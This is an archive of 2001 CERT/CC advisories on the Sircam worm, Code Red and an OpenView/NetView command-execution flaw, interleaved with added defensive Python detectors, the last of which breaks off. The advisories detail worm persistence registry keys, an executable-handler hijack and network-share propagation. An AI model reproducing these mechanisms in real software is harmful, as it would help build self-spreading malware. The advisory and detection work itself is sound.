   Users who receive copies of the malicious code through electronic mail might recognize the sender. We encourage users to avoid opening attachments received through electronic mail, regardless of the sender's name, without prior knowledge of the origin of the file or a valid digital signature.

   The email message will contain an attachment whose name matches the subject line and has a double file extension (e.g. subject.ZIP.BAT or subject.DOC.EXE). The CERT/CC has confirmed reports that the first extension may be .DOC, .XLS, or .ZIP. Anti-virus vendors have referred to additional extensions, including .GIF, .JPG, .JPEG, .MPEG, .MOV, .MPG, .PDF, .PNG, and .PS. The second extension will be .EXE, .COM, .BAT, .PIF, or .LNK.

   The attached file contains both the malicious code and the contents of a file copied from an infected system. When the attachment is opened, the copied file is extracted to both the %TEMP% folder (usually C:\WINDOWS\TEMP) and the Recycled folder on the affected system. The original file is then opened using the appropriate default viewer while the infection process continues in the background.

   It is possible for the recipient to be tricked into opening this malicious attachment since the file will appear without the .EXE, .BAT, .COM, .LNK, or .PIF extension if the "Hide file extensions for known file types" option is enabled in Windows. See IN-2000-07 for additional information on the exploitation of hidden file extensions.
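   The attachment-naming rule above (name equals the subject line, document extension followed by an executable extension) is something a mail gateway can check mechanically. The following is an added example, not part of the advisory, of such a screen: it flags attachments whose name matches the double-extension pattern, notes when the name also repeats the subject line, and shows what Explorer would display for the file with extension hiding on. The extension lists come from the advisory; the sample subject and attachment names are constructed, and treating the five executable types as "known file types" whose extension Windows hides is an assumption.

```python
# Extension lists from the advisory: a document-looking first extension and an
# executable second extension.
FIRST_EXT = {".doc", ".xls", ".zip", ".gif", ".jpg", ".jpeg", ".mpeg",
             ".mov", ".mpg", ".pdf", ".png", ".ps"}
EXEC_EXT = {".exe", ".com", ".bat", ".pif", ".lnk"}


def extensions(name):
    """All dotted extensions of a file name, lowercased: 'a.doc.exe' -> ['.doc', '.exe']."""
    parts = name.lower().split(".")
    return ["." + p for p in parts[1:]] if len(parts) > 1 else []


def displayed_name(name):
    """Name as Explorer shows it with 'Hide file extensions for known file types' on.
    Assumption: the executable types listed in the advisory are registered types,
    so only their (last) extension is hidden; the document extension stays visible."""
    exts = extensions(name)
    if exts and exts[-1] in EXEC_EXT:
        return name[: -len(exts[-1])]
    return name


def double_extension_findings(name):
    """Reasons an attachment name looks like the W32/Sircam naming scheme."""
    exts = extensions(name)
    reasons = []
    if len(exts) >= 2 and exts[-1] in EXEC_EXT and exts[-2] in FIRST_EXT:
        reasons.append(f"document-looking name ends in executable extension {exts[-1]}")
    return reasons


def screen_message(subject, attachments):
    """Map each suspicious attachment name to the reasons it was flagged."""
    findings = {}
    for att in attachments:
        reasons = double_extension_findings(att)
        stem = att.split(".")[0]
        if reasons and stem.strip().lower() == subject.strip().lower():
            reasons.append("attachment name repeats the subject line")
        if reasons:
            findings[att] = reasons
    return findings


# Constructed sample message (not from the advisory).
SAMPLE_SUBJECT = "Quarterly report"
SAMPLE_ATTACHMENTS = ["Quarterly report.doc.exe", "notes.txt", "photo.jpg.pif"]

if __name__ == "__main__":
    for att, reasons in screen_message(SAMPLE_SUBJECT, SAMPLE_ATTACHMENTS).items():
        print(f"{att!r} (displayed as {displayed_name(att)!r}): {'; '.join(reasons)}")
```

   A gateway that quarantines on the first reason alone will also stop plain double-extension mail that is not Sircam; the subject match is the stronger Sircam-specific signal and can drive a hard block. Neither check replaces an updated anti-virus signature, since the attachment name is the easiest thing for a variant to change.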
   W32/Sircam includes its own SMTP client capabilities, which it uses to propagate via email. It determines its recipient list by recursively searching for email addresses contained in all *.wab (Windows Address Book) files in the %SYSTEM% folder. Additionally, it searches the folders referred to by

          HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Cache
          HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Desktop

   for files containing email addresses. All addresses found are stored in SC??.DLL or S??.DLL files hidden in the %SYSTEM% folder.

   W32/Sircam first attempts to send messages using the default email settings for the current user. If the default settings are not present, it appears to use one of the following SMTP relays:

     * prodigy.net.mx
     * NetBIOS name for 'MAIL'
     * mail.[domain] (e.g., mail.example.org)
     * dobleclick.com.mx
     * enlace.net
     * goeke.net

   Propagation Via Network Shares

   In addition to email-based propagation, analysis by anti-virus vendors suggests that W32/Sircam can spread through unprotected network shares. Unlike the email propagation method, which requires a user to open an attachment to infect the machine, propagation of W32/Sircam via network shares requires no human intervention.

   If W32/Sircam detects Windows networking shares with write access, it

     1. copies itself to \\[share]\Recycled\SirC32.EXE
     2. appends "@ win\Recycled\SirC32.exe" to AUTOEXEC.BAT

   If the share contains a Windows folder, it also

     3. copies \\[share]\Windows\rundll32.exe to \\[share]\Windows\run32.exe
     4. copies itself to \\[share]\Windows\rundll32.exe
     5. when virus is executed from rundll32.exe, it calls run32.exe

   Infection process

     1. When installed on a victim machine, W32/Sircam installs a copy of itself in two hidden files:
          + %SYSTEM%\SCam32.exe
          + Recycled\SirC32.exe
        Installing in Recycled may hide it from anti-virus software since some do not check this folder by default.
        Based on external analyses, there is also a probability that W32/Sircam will copy itself to the %SYSTEM% folder as ScMx32.exe. In that case, another copy is created in the folder referred to by

          HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Startup

        (the current user's personal startup folder). The copy created in that location is named Microsoft Internet Office.exe. When the affected user next logs in, this copy of W32/Sircam will be started automatically.

     2. The registry entry

          HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\Driver32

        is set to %SYSTEM%\SCam32.exe so that W32/Sircam will run automatically at system startup.

     3. The registry entry

          HKEY_CLASSES_ROOT\exefile\shell\open\command

        is set to "C:\Recycled\SirC32.exe" "%1" %*", causing W32/Sircam to execute whenever another executable is run.

     4. A new registry entry, HKEY_LOCAL_MACHINE\Software\SirCam, is created to store data required by W32/Sircam during execution.

     5. W32/Sircam searches for filenames with .DOC, .XLS, .ZIP extensions in the folders referred to by

          HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Personal
          HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Desktop

        While the personal folder may vary with configuration, it is often set to \My Documents or \Windows\Profiles\%username%\Personal. A list of these files is stored in %SYSTEM%\scd.dll.

     6. W32/Sircam attaches its own binary to selected files it finds and stores the combined file in the Recycled folder.

II. Impact

   W32/Sircam can have a direct impact on both the computer which was infected as well as those with which it communicates over email.

     * Breaches of confidentiality: The malicious code will at a minimum search through select folders and mail potentially sensitive files. This form of attack is extremely serious since it is one from which it is impossible to recover.
       Once a file has been publicly distributed, any potentially sensitive information in it cannot be retracted.

     * Limit Availability (Denial of Service)
          + Fill entire hard drive: Based on external analyses, on any given day, there is a probability that it will create a file named C:\Recycled\sircam.sys which consumes all free space on the C: drive. A full disk will prevent users from saving files to that drive, and in certain configurations impede system-level tasks (e.g., swapping, printing).
          + Propagation via mass emailing: W32/Sircam will attempt to propagate by sending itself through email to addresses obtained as described above. This propagation can lead to congestion in mail servers that may prevent them from functioning as expected.

            NOTE: Since W32/Sircam uses native SMTP routines connecting to pre-defined mail servers, propagation is independent of the mail client software used.

     * Loss of Integrity: Published reports indicate that on October 16 there is a reasonable probability that W32/Sircam will attempt to recursively delete all files from the drive on which Windows is installed (typically C:).

III. Solution

   Run and Maintain an Anti-Virus Product

   It is important for users to update their anti-virus software. Most anti-virus software vendors have released updated information, tools, or virus databases to help detect and partially recover from this malicious code. A list of vendor-specific anti-virus information can be found in Appendix A.

   Many anti-virus packages support automatic updates of virus definitions. We recommend using these automatic updates when available.

   Exercise Caution When Opening Attachments

   Exercise caution when receiving email with attachments. Users should never open attachments from an untrusted origin, or ones that appear suspicious in any way. Finally, cryptographic checksums should also be used to validate the integrity of the file.

   The effects of this class of malicious code are activated only when the file in question is executed.
   Social engineering is typically employed to trick a recipient into executing the malicious file. The best advice with regard to malicious files is to avoid executing them in the first place. The following tech tip offers suggestions as to how to avoid them:

   Protecting yourself from Email-borne Viruses and Other Malicious Code During Y2K and Beyond

   Filter the Email or use a Firewall

   Sites can use email filtering techniques to delete messages containing subject lines known to contain the malicious code, or they can filter all attachments. Likewise, a firewall or border router can be used to stop the W32/Sircam outbound SMTP connections to mail servers outside of the local network. This filtering strategy will prevent further propagation of the worm from a particular host when the local mail configuration is not used.

Appendix A. - Vendor Information

   Aladdin Knowledge Systems
          http://www.esafe.com/home/csrt/valerts2.asp?virus_no=10068

   Central Command, Inc.
          http://support.centralcommand.com/cgi-bin/command.cfg/php/enduser/std_adp.php?p_refno=010718-000010

   Command Software Systems
          http://www.commandsoftware.com/virus/sircam.html

   Computer Associates
          http://www.cai.com/virusinfo/encyclopedia/descriptions/s/sircam137216.htm

   Data Fellows Corp
          http://www.datafellows.com/v-descs/sircam.shtml

   McAfee
          http://vil.mcafee.com/dispVirus.asp?virus_k=99141&

   Norman Data Defense Systems
          http://www.norman.com/virus_info/w32_sircam.shtml

   Panda Software
          http://www.pandasoftware.es/vernoticia.asp?noticia=987

   Proland Software
          http://www.pspl.com/virus_info/worms/sircam.htm

   Sophos
          http://www.sophos.com/virusinfo/analyses/w32sircama.html

   Symantec
          http://www.symantec.com/avcenter/venc/data/w32.sircam.worm@mm.html

   Trend Micro
          http://www.antivirus.com/vinfo/virusencyclo/default5.asp?VName=TROJ_SIRCAM.A

   You may wish to visit the CERT/CC's Computer Virus Resources Page located at:

   http://www.cert.org/other_sources/viruses.html
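   Steps 2 through 4 of the infection process above are registry changes, which makes them convenient indicators during incident triage when an anti-virus scan is not yet available. The following is an added example, not part of the advisory, that parses a registry export in .reg text format and reports the three indicators: a RunServices\Driver32 value starting SCam32.exe, an exefile\shell\open\command handler that is no longer the plain "%1" %*, and the presence of HKLM\Software\SirCam. The export excerpts are constructed to mirror the advisory's values (the C:\WINDOWS\SYSTEM path standing in for %SYSTEM% is an assumption); key and value names come from the advisory.

```python
import re

# Constructed .reg export that mirrors the infection-process steps above.
# Assumption: %SYSTEM% resolves to C:\WINDOWS\SYSTEM on this host.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices]
"Driver32"="C:\\WINDOWS\\SYSTEM\\SCam32.exe"

[HKEY_CLASSES_ROOT\exefile\shell\open\command]
@="\"C:\\Recycled\\SirC32.exe\" \"%1\" %*"

[HKEY_LOCAL_MACHINE\Software\SirCam]
"""

# Constructed export of a clean host: the stock exefile handler, nothing else.
CLEAN_REG = r"""Windows Registry Editor Version 5.00

[HKEY_CLASSES_ROOT\exefile\shell\open\command]
@="\"%1\" %*"
"""

EXEFILE_KEY = r"HKEY_CLASSES_ROOT\exefile\shell\open\command"
RUNSERVICES_KEY = r"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices"
SIRCAM_KEY = r"HKEY_LOCAL_MACHINE\Software\SirCam"
STOCK_EXEFILE_COMMAND = '"%1" %*'  # Windows default handler for .exe files


def parse_reg(text):
    """Parse .reg text into {key (lowercased): {value name: string value}}.

    Only string values are needed here; '@' is the key's default value. Registry
    key names are case-insensitive, so keys are stored lowercased. A real export
    is UTF-16 on disk: read it with encoding='utf-16' before calling this."""
    keys = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("Windows Registry Editor"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].lower()
            keys.setdefault(current, {})
            continue
        if current is None or "=" not in line:
            continue
        name, _, value = line.partition("=")
        name = "@" if name == "@" else name.strip('"')
        if value.startswith('"') and value.endswith('"'):
            # .reg escapes backslash and double quote with a backslash.
            value = re.sub(r"\\(.)", r"\1", value[1:-1])
        keys[current][name] = value
    return keys


def check_sircam_indicators(keys):
    """Return a list of human-readable findings; empty means no indicator present."""
    findings = []
    command = keys.get(EXEFILE_KEY.lower(), {}).get("@")
    if command is not None and command.strip() != STOCK_EXEFILE_COMMAND:
        findings.append(f"exefile handler hijacked: {command}")
    driver = keys.get(RUNSERVICES_KEY.lower(), {}).get("Driver32")
    if driver and driver.lower().endswith("scam32.exe"):
        findings.append(f"RunServices\\Driver32 starts {driver}")
    if SIRCAM_KEY.lower() in keys:
        findings.append("HKLM\\Software\\SirCam key present")
    return findings


if __name__ == "__main__":
    for label, text in (("infected", SAMPLE_REG), ("clean", CLEAN_REG)):
        print(label, check_sircam_indicators(parse_reg(text)) or ["no indicators"])
```

   The exefile check is deliberately generic: any handler other than the stock "%1" %* is reported, so the same check catches other malware that wraps executable launches. Because the handler hijack runs the worm every time an .exe starts, restoring that value is part of cleanup, not just detection.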
______________________________________________________________________

   Authors: Roman Danyliw, Chad Dougherty, Allen Householder
______________________________________________________________________

   This document is available from:
   http://www.cert.org/advisories/CA-2001-22.html
______________________________________________________________________
   Copyright 2001 Carnegie Mellon University.

Revision History

   July 25, 2001: Initial release

-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 5.0i for non-commercial use
Charset: noconv

iQCVAwUBO18P/QYcfu8gsZJZAQH2XAP/dFPRLX4MGRYxKSc67J+hRclhijxGIFn+
Jo7M4jWb2GeImjxdzRO5bbqGHUfV7Jm7gjXRdIdBTJuK0xIN2tdGjdp3/kEbaWE7
oqise1azNitAWSn2pEaVXidHyY3wm3ed5XHKZmShU/5PXGoa/avhnXqRrv7p/yup
hBWgsoeBiLI=
=WuU+
-----END PGP SIGNATURE-----

From - Fri Jul 27 08:43:30 2001
Received: from canaveral.red.cert.org (canaveral.red.cert.org [192.88.209.11]) by uclink4.berkeley.edu (8.10.1/8.10.1) with ESMTP id f6R4HsD09859; Thu, 26 Jul 2001 21:17:54 -0700 (PDT)
Received: from localhost (lnchuser@localhost) by canaveral.red.cert.org (8.9.3/8.9.3/1.11) with SMTP id VAA02275; Thu, 26 Jul 2001 21:26:23 -0400 (EDT)
Date: Thu, 26 Jul 2001 21:26:23 -0400 (EDT)
Received: by canaveral.red.cert.org; Thu, 26 Jul 2001 21:18:48 -0400
From: CERT Advisory
To: cert-advisory@cert.org
Organization: CERT(R) Coordination Center - +1 412-268-7090
List-Post: NO (posting not allowed on this list)
Subject: CERT Advisory CA-2001-23

-----BEGIN PGP SIGNED MESSAGE-----

CERT Advisory CA-2001-23 Continued Threat of the "Code Red" Worm

   Original release date: July 26, 2001
   Source: CERT/CC

   A complete revision history can be found at the end of this file.

Systems Affected

     * Microsoft Windows NT 4.0 with IIS 4.0 or IIS 5.0 enabled and Index Server 2.0 installed
     * Windows 2000 with IIS 4.0 or IIS 5.0 enabled and Indexing services installed
     * Cisco CallManager, Unity Server, uOne, ICS7750, Building Broadband Service Manager (these systems run IIS)
     * Unpatched Cisco 600 series DSL routers

Overview

   Since around July 13, 2001, at least two variants of the self-propagating malicious code "Code Red" have been attacking hosts on the Internet (see CA-2001-19 "Code Red" Worm Exploiting Buffer Overflow In IIS Indexing Service DLL). Different organizations who have analyzed "Code Red" have reached different conclusions about the behavior of infected machines when their system clocks roll over to the next month. We believe the worm will begin propagating again on August 1, 2001 0:00 GMT, and there is evidence that tens of thousands of systems are already infected or vulnerable to re-infection at that time. Because the worm propagates very quickly, it is likely that nearly all vulnerable systems will be compromised by August 2, 2001. The CERT/CC has received reports indicating that at least 280,000 hosts were compromised in the first wave.

I. Description

   The "Code Red" worm is malicious self-propagating code that exploits Microsoft Internet Information Server (IIS)-enabled systems susceptible to the vulnerability described in CA-2001-13 Buffer Overflow In IIS Indexing Service DLL. Its activity on a compromised machine is time sensitive; different activity occurs based on the date (day of the month) of the system clock. The CERT/CC is aware of at least two major variants of the worm, each of which exhibits the following pattern of behavior:

     * Propagation mode (from the 1st - 19th of the month): The infected host will attempt to connect to TCP port 80 of randomly chosen IP addresses in order to further propagate the worm. Depending on the configuration of the host that receives this request, there are varied consequences.
          + Unpatched IIS 4.0 and 5.0 servers with Indexing service installed will almost certainly be compromised by the "Code Red" worm. In the earlier variant of the worm, victim hosts with a default language of English experienced a defacement on all pages requested from the web server. Hosts infected with the later variant did not experience any change in the served content.
          + Unpatched Cisco 600-series DSL routers will process the HTTP request and trigger an unrelated vulnerability that causes the router to stop forwarding packets. [http://www.cisco.com/warp/public/707/cisco-code-red-worm-pub.shtml]
          + Systems not running IIS, but with an HTTP server listening on TCP port 80 will probably accept the HTTP request, return with an "HTTP 400 Bad Request" message, and potentially log this request in an access log.
     * Flood mode (from the 20th - 27th of the month): A packet-flooding denial-of-service attack will be launched against a specific IP address embedded in the code.
     * Termination (after the 27th day): The worm remains in memory but is otherwise inactive.

   Detailed technical analysis of the "Code Red" worm can be found in

   http://www.cert.org/advisories/CA-2001-19.html

II. Impact

   Data reported to the CERT/CC indicates that the "Code Red" worm infected more than 250,000 systems in just 9 hours. Figure 1 illustrates the activity between 6:00 AM EDT and 8:00 PM EDT on July 19, 2001.

   [See Figure 1 at http://www.cert.org/advisories/CA-2001-23.html]

   NOTE: After 8:00 PM EDT on July 19 (0:00 GMT July 20), the worm switched into flood mode on most infected systems, so the number of infected systems remained fairly constant after that time.

   Our analysis estimates that starting with a single infected host, the time required to infect all vulnerable IIS servers with this worm could be less than 18 hours. Since the worm is programmed to continue propagating for the first 19 days of the month, widespread denial of service may result due to heavy scan traffic.

   As reported in CA-2001-19, infected systems may experience web site defacement as well as performance degradation as a result of the propagating activity of this worm. This degradation can become quite severe, and in fact may cause some services to stop entirely, since it is possible for a machine to be infected with multiple copies of the worm simultaneously.

   Furthermore, it is important to note that the IIS indexing vulnerability that the "Code Red" worm exploits can be used to execute arbitrary code in the Local System security context. This level of privilege effectively gives an attacker complete control of the infected system.

III. Solutions

   The CERT/CC encourages all Internet sites to review CA-2001-13 and ensure workarounds or patches have been applied on all affected hosts on your network.

   If you believe a host under your control has been compromised, you may wish to refer to

   http://www.cert.org/tech_tips/win-UNIX-system_compromise.html

   Known versions of the worm reside entirely in memory; therefore, a reboot of the machine will purge the worm from the system. However, due to the rapid propagation of the worm, the likelihood of re-infection is quite high.
   Taking the system offline and applying the vendor patch will eliminate the vulnerability exploited by the "Code Red" worm.

IV. Good Practices

   Consistent with the security best-practice of denying all network traffic and only selectively allowing that which is required, ingress and egress filtering should be implemented at the network edge. Likewise, controls must be in place to ensure that all software used on a network is properly maintained.

   Ingress filtering

   Ingress filtering manages the flow of traffic as it enters a network under your administrative control. Servers are typically the only machines that need to accept inbound connections from the public Internet. In the network usage policy of many sites, there are few reasons for external hosts to initiate inbound connections to machines that provide no public services. Thus, ingress filtering should be performed at the border to prohibit externally initiated inbound connections to non-authorized services. In this fashion, the effectiveness of many intruder scanning techniques can be dramatically reduced.

   With "Code Red," ingress filtering will prevent instances of the worm outside of your network from infecting machines in the local network that are not explicitly authorized to provide public web services.

   Egress filtering

   Egress filtering manages the flow of traffic as it leaves a network under your administrative control. There is typically limited need for machines providing public services to initiate outbound connections to the Internet. In the case of "Code Red," employing egress filtering will prevent compromised IIS servers on your network from further propagating the worm.

   Installing new software with the latest patches

   When installing an operating system or application on a host for the first time, it is insufficient to merely use the install media. Vulnerabilities are often discovered after the software becomes widely distributed.
   Thus, prior to connecting this host to the network, the latest security patches for the software should be obtained from the vendor and applied.

Appendix A. - Vendor Information

   This appendix contains information provided by vendors for this advisory. When vendors report new information to the CERT/CC, we update this section and note the changes in our revision history. If a particular vendor is not listed below, we have not received their comments.

   Cisco Systems

          Cisco has published a security advisory describing this vulnerability at
          http://www.cisco.com/warp/public/707/cisco-code-red-worm-pub.shtml

   Microsoft Corporation

          The following document regarding the vulnerability exploited by the "Code Red" worm is available from Microsoft:
          http://www.microsoft.com/technet/security/bulletin/MS01-033.asp
______________________________________________________________________

   Author(s): Roman Danyliw and Allen Householder
______________________________________________________________________

   This document is available from:
   http://www.cert.org/advisories/CA-2001-23.html
______________________________________________________________________
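   The ingress and egress rules in the Good Practices section above reduce to two decisions at the border: an externally initiated connection is allowed only toward a host explicitly authorized to offer that public service, and a host that offers a public service is not allowed to initiate connections outward. The following is an added example, not part of the advisory, that encodes those two decisions and runs them over constructed connection attempts, including the two Code Red cases the advisory describes (an outside scanner reaching an internal machine that merely has IIS installed, and an infected internal server scanning outward). The address plan, the single authorized web server and the choice to let ordinary workstations browse outward are assumptions.

```python
import ipaddress
from collections import Counter

# Constructed site layout (assumption): one internal /24, one host authorized
# to serve the public on TCP/80. Workstations may still initiate outbound
# connections; only the public servers are held to the egress rule.
INTERNAL_NET = ipaddress.ip_network("192.0.2.0/24")
PUBLIC_WEB_SERVERS = {ipaddress.ip_address("192.0.2.80")}
PUBLIC_SERVICES = {80}


def decide(src, dst, dport):
    """Border decision for a connection attempt (the SYN) from src to dst:dport.

    ingress-allow / ingress-deny for externally initiated connections,
    egress-allow / egress-deny for internally initiated ones, and not-border
    for traffic that never crosses the edge."""
    s, d = ipaddress.ip_address(src), ipaddress.ip_address(dst)
    inbound = s not in INTERNAL_NET and d in INTERNAL_NET
    outbound = s in INTERNAL_NET and d not in INTERNAL_NET
    if inbound:
        authorized = d in PUBLIC_WEB_SERVERS and dport in PUBLIC_SERVICES
        return "ingress-allow" if authorized else "ingress-deny"
    if outbound:
        # Servers providing public services have no need to open connections out.
        return "egress-deny" if s in PUBLIC_WEB_SERVERS else "egress-allow"
    return "not-border"


def evaluate(flows):
    """Return [(src, dst, dport, decision), ...] for a list of (src, dst, dport)."""
    return [(src, dst, dport, decide(src, dst, dport)) for src, dst, dport in flows]


# Constructed connection attempts (not from the advisory).
SAMPLE_FLOWS = [
    ("203.0.113.5", "192.0.2.80", 80),    # outside scanner -> authorized web server
    ("203.0.113.5", "192.0.2.23", 80),    # outside scanner -> workstation running IIS
    ("192.0.2.80", "198.51.100.9", 80),   # infected internal server scanning outward
    ("192.0.2.23", "198.51.100.9", 80),   # workstation browsing outward
    ("192.0.2.23", "192.0.2.80", 80),     # internal to internal, never seen at the border
]

if __name__ == "__main__":
    results = evaluate(SAMPLE_FLOWS)
    for row in results:
        print(row)
    print(Counter(decision for *_, decision in results))
```

   The first flow shows the limit of filtering: the authorized web server must still accept port 80 from anywhere, so for that host only the patch removes the exposure. Everything else the worm attempts is stopped at the edge by a policy that never mentions the worm at all.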
   Copyright 2001 Carnegie Mellon University.
Revision History

   Jul 26, 2001: Initial release

-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 5.0i for non-commercial use
Charset: noconv

iQCVAwUBO2DBMwYcfu8gsZJZAQH8+AP8DjgCfr3pdIA4YeMG+B9F3Ko2iL108d9f
YA3662PWBMFQcQAhAaAd7+iAUOPmVSENZ8fqc6MGt9guis72J4kmGjBBUoKIqQ3Z
foV9TZUyZSi56e+q/GEq7hVtTn23MYh/n4tttvhnmrRqKe6biGwjS3PMu11KZqeK
RBlRqNc4ItA=
=hvKD
-----END PGP SIGNATURE-----

From - Sun Jul 29 14:03:33 2001
Received: from canaveral.red.cert.org (canaveral.red.cert.org [192.88.209.11]) by uclink4.berkeley.edu (8.10.1/8.10.1) with ESMTP id f6TL2rJ11447; Sun, 29 Jul 2001 14:02:53 -0700 (PDT)
Received: from localhost (lnchuser@localhost) by canaveral.red.cert.org (8.9.3/8.9.3/1.11) with SMTP id QAA11752; Sun, 29 Jul 2001 16:24:48 -0400 (EDT)
Date: Sun, 29 Jul 2001 16:24:48 -0400 (EDT)
Received: by canaveral.red.cert.org; Sun, 29 Jul 2001 16:17:41 -0400
From: CERT Advisory
To: cert-advisory@cert.org
Organization: CERT(R) Coordination Center - +1 412-268-7090
List-Post: NO (posting not allowed on this list)
Subject: Public Alert about the Code Red worm

-----BEGIN PGP SIGNED MESSAGE-----

We, the CERT/CC, along with the other organizations listed below, are jointly publishing this alert about a serious threat to the Internet.

For Immediate Release: 3:00 PM EDT July 29, 2001

A Very Real and Present Threat to the Internet: July 31 Deadline For Action

Summary:

   The Code Red Worm and mutations of the worm pose a continued and serious threat to Internet users. Immediate action is required to combat this threat. Users who have deployed software that is vulnerable to the worm (Microsoft IIS Versions 4.0 and 5.0) must install, if they have not done so already, a vital security patch.

How Big Is The Problem?

   On July 19, the Code Red worm infected more than 250,000 systems in just 9 hours. The worm scans the Internet, identifies vulnerable systems, and infects these systems by installing itself. Each newly installed worm joins all the others causing the rate of scanning to grow rapidly. This uncontrolled growth in scanning directly decreases the speed of the Internet and can cause sporadic but widespread outages among all types of systems.

   Code Red is likely to start spreading again on July 31st, 2001 8:00 PM EDT and has mutated so that it may be even more dangerous. This spread has the potential to disrupt business and personal use of the Internet for applications such as electronic commerce, email and entertainment.

Who Must Act?

   Every organization or person who has Windows NT or Windows 2000 systems AND the IIS web server software may be vulnerable. IIS is installed automatically for many applications.
   If you are not certain, follow the instructions attached to determine whether you are running IIS 4.0 or 5.0. If you are using Windows 95, Windows 98, or Windows Me, there is no action that you need to take in response to this alert.

What To Do If You Are Vulnerable?

   a. To rid your machine of the current worm, reboot your computer.

   b. To protect your system from re-infection: Install Microsoft's patch for the Code Red vulnerability problem:

     * Windows NT version 4.0:
       http://www.microsoft.com/Downloads/Release.asp?ReleaseID=30833
     * Windows 2000 Professional, Server and Advanced Server:
       http://www.microsoft.com/Downloads/Release.asp?ReleaseID=30800

   Step-by-step instructions for these actions are posted at www.digitalisland.com/codered

   Microsoft's description of the patch and its installation, and the vulnerability it addresses is posted at:
   http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS01-033.asp

Because of the importance of this threat, this alert is being made jointly by:

   Microsoft
   The National Infrastructure Protection Center
   Federal Computer Incident Response Center (FedCIRC)
   Information Technology Association of America (ITAA)
   CERT Coordination Center
   SANS Institute
   Internet Security Systems
   Internet Security Alliance

-----BEGIN PGP SIGNATURE-----
Version: PGP 6.5.8

iQCVAwUBO2RpCgYcfu8gsZJZAQGFrAP/TzyQ7lyshdKb7XeNNaVTFAZzO1hB1vKG
CZsaPxzqF2/GMgAQJ8HNum43QBSzr+H96f/5c7Op9ac1SefzuyWs14z+BhBXr6mf
Io9vClcL3h9saqV/J1Bkv0psYhhImTgLvAWZIYneYMuvY39zjxLC2/jkKLw8dWze
lcdFPH5j9vE=
=3biQ
-----END PGP SIGNATURE-----

From - Wed Aug 15 12:47:43 2001
Received: from canaveral.red.cert.org (canaveral.red.cert.org [192.88.209.11]) by uclink4.berkeley.edu (8.11.4/8.11.4) with ESMTP id f7FJjrN15164; Wed, 15 Aug 2001 12:45:53 -0700 (PDT)
Received: from localhost (lnchuser@localhost) by canaveral.red.cert.org (8.9.3/8.9.3/1.11) with SMTP id OAA24049; Wed, 15 Aug 2001 14:10:05 -0400 (EDT)
Date: Wed, 15 Aug 2001 14:10:05 -0400 (EDT)
Received: by canaveral.red.cert.org; Wed, 15 Aug 2001 14:04:54 -0400
From: CERT Advisory
To: cert-advisory@cert.org
Organization: CERT(R) Coordination Center - +1 412-268-7090
Subject: CERT Advisory CA-2001-24

CERT Advisory CA-2001-24 Vulnerability in OpenView and NetView

Original release date: August 15, 2001
Last revised: --
Source: CERT/CC

A complete revision history can be found at the end of this file.

Systems Affected

   * Systems running HP OpenView Network Node Manager (NNM) Version 6.1 on the following platforms:
        * HP9000 Servers running HP-UX releases 10.20 and 11.00 (only)
        * Sun Microsystems Solaris releases 2.x
        * Microsoft Windows NT4.x / Windows 2000
   * Systems running Tivoli NetView Versions 5.x and 6.x on the following platforms:
        * IBM AIX
        * Sun Microsystems Solaris
        * Compaq Tru64 Unix
        * Microsoft Windows NT4.x / Windows 2000

Overview

ovactiond is a component of OpenView by Hewlett-Packard Company (HP) and NetView by Tivoli, an IBM Company (Tivoli). These products are used to manage large systems and networks. There is a serious vulnerability in ovactiond that allows intruders to execute arbitrary commands with elevated privileges. This may subsequently lead to an intruder gaining administrative control of a vulnerable machine.

I. Description

ovactiond is the SNMP trap and event handler for both OpenView and NetView. There is a vulnerability in ovactiond that allows an intruder to execute arbitrary commands by sending a malicious message to the management server. These commands run with the privileges of the ovactiond process, which varies according to the operating system. OpenView version 6.1 is vulnerable in the default configuration.
Versions prior to 6.1 are not vulnerable in the default configuration, but there are public reports that versions prior to 6.1 may be vulnerable if users have made customizations to the trapd.conf file.

On June 21, 2001, HP released a security bulletin (HP SB #154) and a patch for this vulnerability in OpenView version 6.1. For more information, see

   http://us-support.external.hp.com/cki/bin/doc.pl/screen=ckiDisplayDocument?docId=200000055277985
   http://www.kb.cert.org/vuls/id/952171

Tivoli NetView versions 5.x and 6.x are not vulnerable with the default configuration. It is, however, likely that customized configurations are vulnerable. This security vulnerability only exists if an authorized user configures additional event actions and specifies potentially destructive varbinds (those of type string or opaque). Tivoli has developed a patch for versions 5.x and 6.x. The patch addresses the vulnerability in ovactiond, as well as taking preventative measures on other components specific to NetView. Tivoli has published information on this vulnerability at

   http://www.tivoli.com/support/

II. Impact

An intruder can execute arbitrary commands with the privileges of the ovactiond process. On UNIX systems, ovactiond typically runs as user bin; on Windows systems it typically runs in the Local System security context. On Windows NT systems, this allows an intruder to gain administrative control of the underlying operating system. On UNIX systems, an intruder may be able to leverage bin access to gain root access.

Additionally, systems running these products often have trust relationships with other network devices. An intruder who compromises these systems may be able to leverage this trust to compromise other devices on the network or to make changes to the network configuration.

III. Solution

Apply a patch

Appendix A contains information provided by vendors for this advisory. We will update the appendix as we receive more information.
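The exposure described above arises when an event action is assembled from trap data and handed to a shell, so a string or opaque varbind becomes part of the command. The following is an added example, not ovactiond or NetView code, contrasting that pattern with an argv-based one; it assumes a trapd.conf-style template in which $1, $2, ... stand for the trap's varbinds (an assumption, since the advisory does not quote the file format), and the trap values are constructed.

```python
"""Event-action builder illustrating the ovactiond exposure described above.

Added example, not ovactiond or NetView code. It assumes a trapd.conf-style
action template in which $1, $2, ... are replaced by the trap's varbinds
(the placeholder syntax is an assumption; the advisory does not quote the
file format). The varbind values below are constructed.
"""
import re
import shlex
from typing import Dict, List

PLACEHOLDER = re.compile(r"\$(\d+)")
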